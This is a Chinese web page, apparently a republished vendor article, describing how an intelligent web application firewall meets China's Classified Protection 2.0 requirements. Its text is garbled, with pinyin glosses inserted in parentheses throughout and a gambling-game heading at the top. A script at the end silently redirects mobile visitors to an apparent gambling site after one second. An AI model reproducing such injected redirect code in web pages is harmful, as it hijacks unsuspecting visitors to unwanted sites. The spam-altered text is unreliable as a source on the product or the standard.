mg游戏推荐

解读新一代智能WAF在等保2.0中的作用(内附WAF有奖活动)

2020-07-17 12:36:59 infoadmin 357



等级保护2.0核心理念解读


应对新技术提出新要求

等级保(bao)护2.0为应对新技术对传统安(an)全(quan)和传统等保(bao)的冲击,通(tong)过安(an)全(quan)扩(kuo)展要求提出了(le)新的安(an)全(quan)要求,以保(bao)障云计算、大(da)数据等新技术下安(an)全(quan)合规。


增强未知威胁防范和攻击溯源能力

增强(qiang)了对未知威胁(xie)的(de)防范(fan)要(yao)求(qiu)(qiu),针对邮件攻(gong)击威胁(xie)提(ti)(ti)出(chu)邮件安全要(yao)求(qiu)(qiu),提(ti)(ti)出(chu)统一管控,要(yao)求(qiu)(qiu)能够对攻(gong)击进行溯源(yuan)和(he)取(qu)证(zheng)。


建立主动安全保障体系

感知(zhi)预警、安全分析、动(dong)态(tai)防护(hu)、全面(mian)检测、应急(ji)处置兵种,打造主动(dong)安全保(bao)障(zhang)体系(xi),提高(gao)信息(xi)系(xi)统(tong)网络抗攻(gong)击能(neng)力。


注重数据安全和个人信息保护

更(geng)加(jia)注重数据安全保障(zhang)和(he)个(ge)人(ren)信息(xi)保护(hu),数据是IT的核心和(he)生命,个(ge)人(ren)信息(xi)保护(hu)在互联网(wang)时代被无(wu)限放大(da)。


WAF满足了等保中的哪些要求



在等保三(san)级(ji)增强版中WAF是入侵防范(fan),恶意代(dai)码防范(fan)的(de)主要手段之一,主要部(bu)署(shu)在数据中心区和DMZ区的(de)边界。

安恒等级保护三(san)级典型拓扑:


图片关键词


01  安全通信网络(luo)层面要(yao)求(qiu)与相关功能


控制点1:网络架构

测评项:应提供通信线路、关键网络设备和关键计算(suan)设备的硬件冗余,保证系统的可用性。


相关功能:

1、WAF部署支持集(ji)群模(mo)式、主-主模(mo)式、主备模(mo)式。

2、支持链路聚合。


02  安全区域边界层面要求(qiu)与(yu)相关功能

 控制点1:入侵防范

测评项:应在关键网络节点处检测、防止或限制从外部发起的网络攻击行为;


控制点2:恶意代码防范

测评项:应在关键网络节点处对恶意代码进行检测和清除,并维护恶意代码防护机制的升级和更新。


控制点3:安全审计

测(ce)评项:应能对远程访(fang)问的用户(hu)行为、访(fang)问互联(lian)网(wang)的用户(hu)行为等单独进行行为审计和数据分析。


相(xiang)关功能(neng):

1、识别并防御恶(e)意请(qing)求(qiu):CC攻(gong)击,跨(kua)站脚本(XSS)、注(zhu)入(ru)式攻(gong)击等。

2、能够识别(bie)服务(wu)端响(xiang)应内(nei)容导致的缺陷,包括:敏感信息泄露、已有的网页后门等。

3、内(nei)置主流Webshell特征(zheng)库(ku),对文件上传(chuan)内(nei)容进行(xing)检(jian)查,防止恶意Webshell上传(chuan)。

4、识别爬虫、扫描器等自动化(hua)工具(ju)的扫描行为。

5、能够与(yu)云端(duan)威胁情报(bao),APT,云端(duan)高(gao)防等(deng)商(shang)品进行(xing)联动。

6、具备审(shen)计网站正常访(fang)问流(liu)量(liang)的(de)能力,提供按小(xiao)时,天、月份生成用户(hu)的(de)访(fang)问数据。


03  安全计算环境(jing)层面要求与相关功(gong)能(neng)


控制点1:数据保密性

测评项:应采用密(mi)(mi)码(ma)技(ji)术保(bao)证重(zhong)要(yao)数(shu)据在传输过程中的保(bao)密(mi)(mi)性,包(bao)括但不限(xian)于鉴(jian)别数(shu)据、重(zhong)要(yao)业务数(shu)据和重(zhong)要(yao)个人信(xin)息等;


相关功能:

内(nei)置身份证、银行(xing)卡(ka)、手机号(hao)等服务(wu)器敏(min)(min)感(gan)信息库,对服务(wu)器响应敏(min)(min)感(gan)内(nei)容进行(xing)隐(yin)藏(zang),并支持自(zi)定义敏(min)(min)感(gan)词。



安恒新一代智能WAF核心亮点

图片关键词



01  语义分析能力

智能语义分析引(yin)擎(qing)基于词法(fa)分析和(he)语法(fa)分析的SQL注入/XSS攻(gong)击检测(ce)(ce)与防御引(yin)擎(qing),规则无(wu)需人(ren)工维护(hu)干预 ,可有效识别(bie)检测(ce)(ce)0day攻(gong)击行为(wei)。




02  机器学习能力

 采用(yong)先(xian)进(jin)的(de)机器学习(xi)算法模型,对(dui)Web业务系(xi)统(tong)建立(li)安全正常的(de)业务数(shu)据模型,通过机器学习(xi)统(tong)计的(de)业务数(shu)据模型辅助智能(neng)安全引擎对(dui)异常流(liu)量检测(ce),降低安全引擎的(de)误报(bao)率和漏(lou)报(bao)率,同时实现对(dui)未知威胁的(de)检测(ce)防护。


03  威胁情报能力

拥(yong)有(you)最新的(de)IP黑名(ming)单库(ku)并保持自(zi)动更新,能够快速(su)检测出僵尸IP、扫描IP、C&C等恶(e)意IP等对业务系统的(de)可疑(yi)访问行为,帮助(zhu)客户快速(su)定位潜在的(de)安全(quan)威胁。


04  SSL加速卡

内置SSL硬件加速(su)卡,通(tong)过专业SSL加速(su)卡解决WAF设备对(dui)于HTTPS流(liu)量(liang)性能处理不足(zu)问题,最高支持20G的SSL处理性能,其HTTPS性能至少提升(sheng)5倍。


05  支持IPV4/IPV6

支持(chi)IPv4和IPv6双协议(yi)栈(zhan)(zhan),可同时对IPv4和IPv6的WEB业务系统进行安(an)全防护,透明串接(jie)、反向代理、旁路镜像均支持(chi)IPv4和IPv6双协议(yi)栈(zhan)(zhan), 已获得IPv6金(jin)牌认证商品资质(zhi)。


06  市场实力认可

2019年中国硬件Web应用防(fang)火墙(qiang)市场厂(chang)商(shang)市场份额(e)排(pai)名(ming)第(di)二(er)——IDC

2018年亚太区市场份额排(pai)名中(zhong)市场份额排(pai)名第二,成为(wei)唯(wei)一一家进(jin)入TOP3的中(zhong)国WAF厂商——Forst & Sullivan


图片关键词

图片关键词

图片关键词

本文转(zhuan)自《安恒(heng)信息合作伙伴中心》


var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();